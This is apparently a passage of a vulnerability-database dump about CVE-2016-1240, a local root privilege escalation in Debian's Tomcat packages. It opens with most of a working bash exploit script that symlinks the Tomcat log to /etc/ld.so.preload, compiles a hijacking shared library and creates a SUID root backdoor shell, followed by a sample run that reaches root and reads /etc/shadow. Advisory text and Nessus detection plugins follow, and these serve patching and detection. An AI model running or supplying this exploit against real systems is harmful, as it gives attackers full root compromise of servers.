echo -e \"\\033[94m \

Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit\

CVE-2016-1240\

\"

echo -e \"Discovered and coded by: \

\

Dawid Golunski \

http://legalhackers.com \\033[0m\"



# Args

if [ $# -lt 1 ]; then

\techo -e \"\

[!] Exploit usage: \

\

$0 path_to_catalina.out [-deferred]\

\"

\texit 3

fi

if [ \"$2\" = \"-deferred\" ]; then

\tmode=\"deferred\"

else

\tmode=\"active\"

fi



# Priv check

echo -e \"\

[+] Starting the exploit in [\\033[94m$mode\\033[0m] mode with the following privileges: \

`id`\"

id | grep -q tomcat

if [ $? -ne 0 ]; then

\techo -e \"\

[!] You need to execute the exploit as tomcat user! Exiting.\

\"

\texit 3

fi



# Set target paths

TOMCATLOG=\"$1\"

if [ ! -f $TOMCATLOG ]; then

\techo -e \"\

[!] The specified Tomcat catalina.out log ($TOMCATLOG) doesn't exist. Try again.\

\"

\texit 3

fi

echo -e \"\

[+] Target Tomcat log file set to $TOMCATLOG\"



# [ Deferred exploitation ]



# Symlink the log file to /etc/default/locale file which gets executed daily on default

# tomcat installations on Debian/Ubuntu by the /etc/cron.daily/tomcatN logrotation cronjob around 6:25am.

# Attackers can freely add their commands to the /etc/default/locale script after Tomcat has been

# restarted and file owner gets changed.

if [ \"$mode\" = \"deferred\" ]; then

\trm -f $TOMCATLOG && ln -s /etc/default/locale $TOMCATLOG

\tif [ $? -ne 0 ]; then

\t\techo -e \"\

[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"

\t\tcleanexit 3

\tfi

\techo -e \"\

[+] Symlink created at: \

`ls -l $TOMCATLOG`\"

\techo -e \"\

[+] The current owner of the file is: \

`ls -l /etc/default/locale`\"

\techo -ne \"\

[+] Keep an eye on the owner change on /etc/default/locale . After the Tomcat restart / system reboot\"

\techo -ne \"\

you'll be able to add arbitrary commands to the file which will get executed with root privileges\"

\techo -ne \"\

at ~6:25am by the /etc/cron.daily/tomcatN log rotation cron. See also -active mode if you can't wait ;)\

\

\"

\texit 0

fi



# [ Active exploitation ]



trap ctrl_c INT

# Compile privesc preload library

echo -e \"\

[+] Compiling the privesc shared library ($PRIVESCSRC)\"

cat <<_solibeof_>$PRIVESCSRC

#define _GNU_SOURCE

#include <stdio.h>

#include <sys/stat.h>

#include <unistd.h>

#include <dlfcn.h>

uid_t geteuid(void) {

\tstatic uid_t (*old_geteuid)();

\told_geteuid = dlsym(RTLD_NEXT, \"geteuid\");

\tif ( old_geteuid() == 0 ) {

\t\tchown(\"$BACKDOORPATH\", 0, 0);

\t\tchmod(\"$BACKDOORPATH\", 04777);

\t\tunlink(\"/etc/ld.so.preload\");

\t}

\treturn old_geteuid();

}

_solibeof_

gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl

if [ $? -ne 0 ]; then

\techo -e \"\

[!] Failed to compile the privesc lib $PRIVESCSRC.\"

\tcleanexit 2;

fi



# Prepare backdoor shell

cp $BACKDOORSH $BACKDOORPATH

echo -e \"\

[+] Backdoor/low-priv shell installed at: \

`ls -l $BACKDOORPATH`\"



# Safety check

if [ -f /etc/ld.so.preload ]; then

\techo -e \"\

[!] /etc/ld.so.preload already exists. Exiting for safety.\"

\tcleanexit 2

fi



# Symlink the log file to ld.so.preload

rm -f $TOMCATLOG && ln -s /etc/ld.so.preload $TOMCATLOG

if [ $? -ne 0 ]; then

\techo -e \"\

[!] Couldn't remove the $TOMCATLOG file or create a symlink.\"

\tcleanexit 3

fi

echo -e \"\

[+] Symlink created at: \

`ls -l $TOMCATLOG`\"



# Wait for Tomcat to re-open the logs

echo -ne \"\

[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...\"

echo -e \"\

You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)\"

while :; do

\tsleep 0.1

\tif [ -f /etc/ld.so.preload ]; then

\t\techo $PRIVESCLIB > /etc/ld.so.preload

\t\tbreak;

\tfi

done



# /etc/ld.so.preload file should be owned by tomcat user at this point

# Inject the privesc.so shared library to escalate privileges

echo $PRIVESCLIB > /etc/ld.so.preload

echo -e \"\

[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges: \

`ls -l /etc/ld.so.preload`\"

echo -e \"\

[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload\"

echo -e \"\

[+] The /etc/ld.so.preload file now contains: \

`cat /etc/ld.so.preload`\"



# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)

echo -e \"\

[+] Escalating privileges via the $SUIDBIN SUID binary to get root!\"

sudo --help 2>/dev/null >/dev/null



# Check for the rootshell

ls -l $BACKDOORPATH | grep rws | grep -q root

if [ $? -eq 0 ]; then

\techo -e \"\

[+] Rootshell got assigned root SUID perms at: \

`ls -l $BACKDOORPATH`\"

\techo -e \"\

\\033[94mPlease tell me you're seeing this too ;) \\033[0m\"

else

\techo -e \"\

[!] Failed to get root\"

\tcleanexit 2

fi



# Execute the rootshell

echo -e \"\

[+] Executing the rootshell $BACKDOORPATH now! \

\"

$BACKDOORPATH -p -c \"rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB\"

$BACKDOORPATH -p



# Job done.

cleanexit 0



--------------[ EOF ]--------------------







Example exploit run:

~~~~~~~~~~~~~~



tomcat7@ubuntu:/tmp$ id

uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)



tomcat7@ubuntu:/tmp$ lsb_release -a

No LSB modules are available.

Distributor ID:\tUbuntu

Description:\tUbuntu 16.04 LTS

Release:\t16.04

Codename:\txenial



tomcat7@ubuntu:/tmp$ dpkg -l | grep tomcat

ii libtomcat7-java 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- core libraries

ii tomcat7 7.0.68-1ubuntu0.1 all Servlet and JSP engine

ii tomcat7-common 7.0.68-1ubuntu0.1 all Servlet and JSP engine -- common files



tomcat7@ubuntu:/tmp$ ./tomcat-rootprivesc-deb.sh /var/log/tomcat7/catalina.out



Tomcat 6/7/8 on Debian-based distros - Local Root Privilege Escalation Exploit

CVE-2016-1240



Discovered and coded by:



Dawid Golunski

http://legalhackers.com



[+] Starting the exploit in [active] mode with the following privileges:

uid=110(tomcat7) gid=118(tomcat7) groups=118(tomcat7)



[+] Target Tomcat log file set to /var/log/tomcat7/catalina.out



[+] Compiling the privesc shared library (/tmp/privesclib.c)



[+] Backdoor/low-priv shell installed at:

-rwxr-xr-x 1 tomcat7 tomcat7 1037464 Sep 30 22:27 /tmp/tomcatrootsh



[+] Symlink created at:

lrwxrwxrwx 1 tomcat7 tomcat7 18 Sep 30 22:27 /var/log/tomcat7/catalina.out -> /etc/ld.so.preload



[+] Waiting for Tomcat to re-open the logs/Tomcat service restart...

You could speed things up by executing : kill [Tomcat-pid] (as tomcat user) if needed ;)



[+] Tomcat restarted. The /etc/ld.so.preload file got created with tomcat privileges:

-rw-r--r-- 1 tomcat7 root 19 Sep 30 22:28 /etc/ld.so.preload



[+] Adding /tmp/privesclib.so shared lib to /etc/ld.so.preload



[+] The /etc/ld.so.preload file now contains:

/tmp/privesclib.so



[+] Escalating privileges via the /usr/bin/sudo SUID binary to get root!



[+] Rootshell got assigned root SUID perms at:

-rwsrwxrwx 1 root root 1037464 Sep 30 22:27 /tmp/tomcatrootsh



Please tell me you're seeing this too ;)



[+] Executing the rootshell /tmp/tomcatrootsh now!



tomcatrootsh-4.3# id

uid=110(tomcat7) gid=118(tomcat7) euid=0(root) groups=118(tomcat7)

tomcatrootsh-4.3# whoami

root

tomcatrootsh-4.3# head -n3 /etc/shadow

root:$6$oaf[cut]:16912:0:99999:7:::

daemon:*:16912:0:99999:7:::

bin:*:16912:0:99999:7:::

tomcatrootsh-4.3# exit

exit



[+] Cleaning up...



[+] Job done. Exiting with code 0







VI. BUSINESS IMPACT

-------------------------



Local attackers who have gained access to tomcat user account (for example

remotely via a vulnerable web application, or locally via weak webroot perms),

could escalate their privileges to root and fully compromise the affected system.





VII. SYSTEMS AFFECTED

-------------------------



The following Debian package versions are affected:



Tomcat 8 <= 8.0.36-2

Tomcat 7 <= 7.0.70-2

Tomcat 6 <= 6.0.45+dfsg-1~deb8u1



A more detailed lists of affected packages can be found at:



Debian:

https://security-tracker.debian.org/tracker/CVE-2016-1240



Ubuntu:

http://www.ubuntu.com/usn/usn-3081-1/



Other systmes that use Tomcat packages provided by Debian may also be affected.





VIII. SOLUTION

-------------------------



Debian Security Team was contacted and has fixed affected upstream packages.

Update to the latest tomcat packages provided by your distribution.



IX. REFERENCES

-------------------------



http://legalhackers.com



http://legalhackers.com/advisories/Tomcat-DebPkgs-Root-Privilege-Escalation-Exploit-CVE-2016-1240.html



The exploit's sourcecode

http://legalhackers.com/exploits/tomcat-rootprivesc-deb.sh



CVE-2016-1240

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1240



Ubuntu Security Notice USN-3081-1:

http://www.ubuntu.com/usn/usn-3081-1/



Debian Security Advisory DSA-3669-1 (tomcat7):

https://lists.debian.org/debian-security-announce/2016/msg00249.html

https://www.debian.org/security/2016/dsa-3669



Debian Security Advisory DSA-3670-1 (tomcat8):

https://www.debian.org/security/2016/dsa-3670



https://security-tracker.debian.org/tracker/CVE-2016-1240





X. CREDITS

-------------------------



The vulnerability has been discovered by Dawid Golunski

dawid (at) legalhackers (dot) com

http://legalhackers.com



XI. REVISION HISTORY

-------------------------



30.09.2016 - Advisory released



XII. LEGAL NOTICES

-------------------------



The information contained within this advisory is supplied \"as-is\" with

no warranties or guarantees of fitness of use or otherwise. I accept no

responsibility for any damage caused by the use or misuse of this information.", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2020-09-04T01:24:17", "description": "Dawid Golunski of LegalHackers discovered that the Tomcat init script

performed unsafe file handling, which could result in local privilege

escalation.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-16T00:00:00", "title": "Debian DSA-3669-1 : tomcat7 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2020-09-02T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:tomcat7"], "id": "DEBIAN_DSA-3669.NASL", "href": "https://www.tenable.com/plugins/nessus/93548", "sourceData": "#

# (C) Tenable Network Security, Inc.

#

# The descriptive text and package checks in this plugin were

# extracted from Debian Security Advisory DSA-3669. The text

# itself is copyright (C) Software in the Public Interest, Inc.

#



include(\"compat.inc\");



if (description)

{

script_id(93548);

script_version(\"2.7\");

script_cvs_date(\"Date: 2018/11/10 11:49:38\");



script_cve_id(\"CVE-2016-1240\");

script_xref(name:\"DSA\", value:\"3669\");



script_name(english:\"Debian DSA-3669-1 : tomcat7 - security update\");

script_summary(english:\"Checks dpkg output for the updated package\");



script_set_attribute(

attribute:\"synopsis\",

value:\"The remote Debian host is missing a security-related update.\"

);

script_set_attribute(

attribute:\"description\",

value:

\"Dawid Golunski of LegalHackers discovered that the Tomcat init script

performed unsafe file handling, which could result in local privilege

escalation.\"

);

script_set_attribute(

attribute:\"see_also\",

value:\"https://packages.debian.org/source/jessie/tomcat7\"

);

script_set_attribute(

attribute:\"see_also\",

value:\"https://www.debian.org/security/2016/dsa-3669\"

);

script_set_attribute(

attribute:\"solution\",

value:

\"Upgrade the tomcat7 packages.



For the stable distribution (jessie), this problem has been fixed in

version 7.0.56-3+deb8u4.\"

);

script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");

script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");

script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");

script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");

script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");

script_set_attribute(attribute:\"exploit_available\", value:\"true\");



script_set_attribute(attribute:\"plugin_type\", value:\"local\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7\");

script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");



script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");

script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/16\");

script_end_attributes();



script_category(ACT_GATHER_INFO);

script_copyright(english:\"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");

script_family(english:\"Debian Local Security Checks\");



script_dependencies(\"ssh_get_info.nasl\");

script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");



exit(0);

}





include(\"audit.inc\");

include(\"debian_package.inc\");





if (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

if (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");

if (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);





flag = 0;

if (deb_check(release:\"8.0\", prefix:\"libservlet3.0-java\", reference:\"7.0.56-3+deb8u4\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"libservlet3.0-java-doc\", reference:\"7.0.56-3+deb8u4\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"libtomcat7-java\", reference:\"7.0.56-3+deb8u4\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat7\", reference:\"7.0.56-3+deb8u4\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat7-admin\", reference:\"7.0.56-3+deb8u4\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat7-common\", reference:\"7.0.56-3+deb8u4\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat7-docs\", reference:\"7.0.56-3+deb8u4\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat7-examples\", reference:\"7.0.56-3+deb8u4\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat7-user\", reference:\"7.0.56-3+deb8u4\")) flag++;



if (flag)

{

if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());

else security_hole(0);

exit(0);

}

else audit(AUDIT_HOST_NOT, \"affected\");

", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-04T01:24:17", "description": "Dawid Golunski of LegalHackers discovered that the Tomcat init script

performed unsafe file handling, which could result in local privilege

escalation.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-16T00:00:00", "title": "Debian DSA-3670-1 : tomcat8 - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2020-09-02T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:tomcat8"], "id": "DEBIAN_DSA-3670.NASL", "href": "https://www.tenable.com/plugins/nessus/93549", "sourceData": "#

# (C) Tenable Network Security, Inc.

#

# The descriptive text and package checks in this plugin were

# extracted from Debian Security Advisory DSA-3670. The text

# itself is copyright (C) Software in the Public Interest, Inc.

#



include(\"compat.inc\");



if (description)

{

script_id(93549);

script_version(\"2.7\");

script_cvs_date(\"Date: 2018/11/10 11:49:38\");



script_cve_id(\"CVE-2016-1240\");

script_xref(name:\"DSA\", value:\"3670\");



script_name(english:\"Debian DSA-3670-1 : tomcat8 - security update\");

script_summary(english:\"Checks dpkg output for the updated package\");



script_set_attribute(

attribute:\"synopsis\",

value:\"The remote Debian host is missing a security-related update.\"

);

script_set_attribute(

attribute:\"description\",

value:

\"Dawid Golunski of LegalHackers discovered that the Tomcat init script

performed unsafe file handling, which could result in local privilege

escalation.\"

);

script_set_attribute(

attribute:\"see_also\",

value:\"https://packages.debian.org/source/jessie/tomcat8\"

);

script_set_attribute(

attribute:\"see_also\",

value:\"https://www.debian.org/security/2016/dsa-3670\"

);

script_set_attribute(

attribute:\"solution\",

value:

\"Upgrade the tomcat8 packages.



For the stable distribution (jessie), this problem has been fixed in

version 8.0.14-1+deb8u3.\"

);

script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");

script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");

script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");

script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");

script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");

script_set_attribute(attribute:\"exploit_available\", value:\"true\");



script_set_attribute(attribute:\"plugin_type\", value:\"local\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat8\");

script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");



script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");

script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/16\");

script_end_attributes();



script_category(ACT_GATHER_INFO);

script_copyright(english:\"This script is Copyright (C) 2016-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");

script_family(english:\"Debian Local Security Checks\");



script_dependencies(\"ssh_get_info.nasl\");

script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");



exit(0);

}





include(\"audit.inc\");

include(\"debian_package.inc\");





if (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

if (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");

if (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);





flag = 0;

if (deb_check(release:\"8.0\", prefix:\"libservlet3.1-java\", reference:\"8.0.14-1+deb8u3\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"libservlet3.1-java-doc\", reference:\"8.0.14-1+deb8u3\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"libtomcat8-java\", reference:\"8.0.14-1+deb8u3\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat8\", reference:\"8.0.14-1+deb8u3\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat8-admin\", reference:\"8.0.14-1+deb8u3\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat8-common\", reference:\"8.0.14-1+deb8u3\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat8-docs\", reference:\"8.0.14-1+deb8u3\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat8-examples\", reference:\"8.0.14-1+deb8u3\")) flag++;

if (deb_check(release:\"8.0\", prefix:\"tomcat8-user\", reference:\"8.0.14-1+deb8u3\")) flag++;



if (flag)

{

if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());

else security_hole(0);

exit(0);

}

else audit(AUDIT_HOST_NOT, \"affected\");

", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T13:32:12", "description": "Dawid Golunski from legalhackers.com discovered that Debian's version

of Tomcat 7 was vulnerable to a local privilege escalation. Local

attackers who have gained access to the server in the context of the

tomcat7 user through a vulnerability in a web application were able to

replace the file with a symlink to an arbitrary file.



The full advisory can be found at



http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-

Escalation-Exploit.txt



In addition this security update also fixes Debian bug #821391. File

ownership in /etc/tomcat7 will no longer be unconditionally overridden

on upgrade. As another precaution the file permissions of Debian

specific configuration files in /etc/tomcat7 were changed to 640 to

disallow world readable access.



For Debian 7 'Wheezy', these problems have been fixed in version

7.0.28-4+deb7u6.



We recommend that you upgrade your tomcat7 packages.



NOTE: Tenable Network Security has extracted the preceding description

block directly from the DLA security advisory. Tenable has attempted

to automatically clean and format it as much as possible without

introducing additional issues.", "edition": 19, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-16T00:00:00", "title": "Debian DLA-623-1 : tomcat7 security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2016-09-16T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:tomcat7-user", "p-cpe:/a:debian:debian_linux:tomcat7-docs", "p-cpe:/a:debian:debian_linux:tomcat7-admin", "p-cpe:/a:debian:debian_linux:tomcat7-examples", "p-cpe:/a:debian:debian_linux:libservlet3.0-java", "p-cpe:/a:debian:debian_linux:tomcat7-common", "cpe:/o:debian:debian_linux:7.0", "p-cpe:/a:debian:debian_linux:libtomcat7-java", "p-cpe:/a:debian:debian_linux:tomcat7", "p-cpe:/a:debian:debian_linux:libservlet3.0-java-doc"], "id": "DEBIAN_DLA-623.NASL", "href": "https://www.tenable.com/plugins/nessus/93545", "sourceData": "#%NASL_MIN_LEVEL 80502

#

# (C) Tenable Network Security, Inc.

#

# The descriptive text and package checks in this plugin were

# extracted from Debian Security Advisory DLA-623-1. The text

# itself is copyright (C) Software in the Public Interest, Inc.

#



include(\"compat.inc\");



if (description)

{

script_id(93545);

script_version(\"2.7\");

script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");



script_cve_id(\"CVE-2016-1240\");



script_name(english:\"Debian DLA-623-1 : tomcat7 security update\");

script_summary(english:\"Checks dpkg output for the updated packages.\");



script_set_attribute(

attribute:\"synopsis\",

value:\"The remote Debian host is missing a security update.\"

);

script_set_attribute(

attribute:\"description\",

value:

\"Dawid Golunski from legalhackers.com discovered that Debian's version

of Tomcat 7 was vulnerable to a local privilege escalation. Local

attackers who have gained access to the server in the context of the

tomcat7 user through a vulnerability in a web application were able to

replace the file with a symlink to an arbitrary file.



The full advisory can be found at



http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-

Escalation-Exploit.txt



In addition this security update also fixes Debian bug #821391. File

ownership in /etc/tomcat7 will no longer be unconditionally overridden

on upgrade. As another precaution the file permissions of Debian

specific configuration files in /etc/tomcat7 were changed to 640 to

disallow world readable access.



For Debian 7 'Wheezy', these problems have been fixed in version

7.0.28-4+deb7u6.



We recommend that you upgrade your tomcat7 packages.



NOTE: Tenable Network Security has extracted the preceding description

block directly from the DLA security advisory. Tenable has attempted

to automatically clean and format it as much as possible without

introducing additional issues.\"

);

# http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-Escalation-Exploit.txt

script_set_attribute(

attribute:\"see_also\",

value:\"http://www.nessus.org/u?f1cb3176\"

);

script_set_attribute(

attribute:\"see_also\",

value:\"https://lists.debian.org/debian-lts-announce/2016/09/msg00016.html\"

);

script_set_attribute(

attribute:\"see_also\",

value:\"https://packages.debian.org/source/wheezy/tomcat7\"

);

script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");

script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");

script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");

script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");

script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");

script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");

script_set_attribute(attribute:\"exploit_available\", value:\"true\");



script_set_attribute(attribute:\"plugin_type\", value:\"local\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet3.0-java\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libservlet3.0-java-doc\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:libtomcat7-java\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-admin\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-common\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-docs\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-examples\");

script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:tomcat7-user\");

script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");



script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/09/15\");

script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/16\");

script_end_attributes();



script_category(ACT_GATHER_INFO);

script_copyright(english:\"This script is Copyright (C) 2016-2020 Tenable Network Security, Inc.\");

script_family(english:\"Debian Local Security Checks\");



script_dependencies(\"ssh_get_info.nasl\");

script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");



exit(0);

}





include(\"audit.inc\");

include(\"debian_package.inc\");





if (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);

if (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");

if (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);





flag = 0;

if (deb_check(release:\"7.0\", prefix:\"libservlet3.0-java\", reference:\"7.0.28-4+deb7u6\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"libservlet3.0-java-doc\", reference:\"7.0.28-4+deb7u6\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"libtomcat7-java\", reference:\"7.0.28-4+deb7u6\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat7\", reference:\"7.0.28-4+deb7u6\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat7-admin\", reference:\"7.0.28-4+deb7u6\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat7-common\", reference:\"7.0.28-4+deb7u6\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat7-docs\", reference:\"7.0.28-4+deb7u6\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat7-examples\", reference:\"7.0.28-4+deb7u6\")) flag++;

if (deb_check(release:\"7.0\", prefix:\"tomcat7-user\", reference:\"7.0.28-4+deb7u6\")) flag++;



if (flag)

{

if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());

else security_hole(0);

exit(0);

}

else audit(AUDIT_HOST_NOT, \"affected\");

", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T13:32:12", "description": "Dawid Golunski from legalhackers.com discovered that Debian's version

of Tomcat 6 was vulnerable to a local privilege escalation. Local

attackers who have gained access to the server in the context of the

tomcat6 user through a vulnerability in a web application were able to

replace the file with a symlink to an arbitrary file.



The full advisory can be found at



http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-

Es calation-Exploit.txt



For Debian 7 'Wheezy', these problems have been fixed in version

6.0.45+dfsg-1~deb7u2.



We recommend that you upgrade your tomcat6 packages.



NOTE: Tenable Network Security has extracted the preceding description

block directly from the DLA security advisory. Tenable has attempted

to automatically clean and format it as much as possible without

introducing additional issues.", "edition": 21, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-09-16T00:00:00", "title": "Debian DLA-622-1 : tomcat6 security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-1240"], "modified": "2016-09-16T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libservlet2.5-java-doc", "p-cpe:/a:debian:debian_linux:tomcat6", "p-cpe:/a:debian:debian_linux:libservlet2.4-java", "p-cpe:/a:debian:debian_linux:tomcat6-common", "p-cpe:/a:debian:debian_linux:tomcat6-docs", "p-cpe:/a:debian:debian_linux:libtomcat6-java", "p-cpe:/a:debian:debian_linux:tomcat6-extras", "p-cpe:/a:debian:debian_linux:tomcat6-user", "p-cpe:/a:debian:debian_linux:tomcat6-admin", "p-cpe:/a:debian:debian_linux:libservlet2.5-java", "p-cpe:/a:debian:debian_linux:tomcat6-examples", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DLA-622.NASL", "href": "https://www.tenable.com/plugins/nessus/93544", "sourceData": "#%NASL_MIN_LEVEL 80502

#

# (C) Tenable Network Security, Inc.

#

# The descriptive text and package checks in this plugin were

# extracted from Debian Security Advisory DLA-622-1. The text

# itself is copyright (C) Software in the Public Interest, Inc.

#



include(\"compat.inc\");



if (description)

{

script_id(93544);

script_version(\"2.9\");

script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/12\");



script_cve_id(\"CVE-2016-1240\");



script_name(english:\"Debian DLA-622-1 : tomcat6 security update\");

script_summary(english:\"Checks dpkg output for the updated packages.\");



script_set_attribute(

attribute:\"synopsis\",

value:\"The remote Debian host is missing a security update.\"

);

script_set_attribute(

attribute:\"description\",

value:

\"Dawid Golunski from legalhackers.com discovered that Debian's version

of Tomcat 6 was vulnerable to a local privilege escalation. Local

attackers who have gained access to the server in the context of the

tomcat6 user through a vulnerability in a web application were able to

replace the file with a symlink to an arbitrary file.



The full advisory can be found at



http://legalhackers.com/advisories/Tomcat-Debian-based-Root-Privilege-

Es calation-Exploit.txt



For Debian 7 'Wheezy', these problems have been fixed in version

6.0.45+dfsg-1~deb7u2.



We recommend that you upgrade your tomcat6 packages.



